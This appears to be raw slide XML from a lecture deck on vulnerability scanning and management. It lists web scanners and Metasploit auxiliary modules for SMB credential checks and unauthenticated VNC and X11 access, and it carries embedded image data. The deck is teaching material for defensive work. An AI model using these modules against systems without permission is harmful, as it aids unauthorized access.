            <a:ext cx="5761989" cy="3505200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What is a vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerability lists</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerability Scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerability Management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Risk Management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0"/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4083470" y="1371600"/>
            <a:ext cx="6127330" cy="5410200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" tIns="0" rIns="45720" bIns="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buNone/>
              <a:defRPr kumimoji="0"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2"/>
              <a:buNone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Arial"/>
              <a:buNone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1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Wingdings 2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1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent4"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial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/>
              <a:buNone/>
              <a:defRPr kumimoji="0"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ct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone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None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None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Technology Specific Scanners</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Free</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Acunetix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> web scanner</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>WebSecurify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> web scanner</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DPScan</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>WPScan</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SQLMap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Paid</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>WebInspect</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Acunetix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468270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2426" y="457201"/>
            <a:ext cx="8181974" cy="1219200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerability scanning with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>metasploit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7975" y="1143000"/>
            <a:ext cx="8181974" cy="5029200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SMB Login</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Given a set of credentials what systems can they access?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	scanner/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>smb_login</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open VNC and X11</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If misconfigured may be accessible without credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	scanner/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vnc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vnc_none_auth</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	scanner/x11/open_x1</a:t>
            </a:r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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="AutoShape 4" descr="data:image/jpeg;base64,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9" descr="data:image/jpeg;base64,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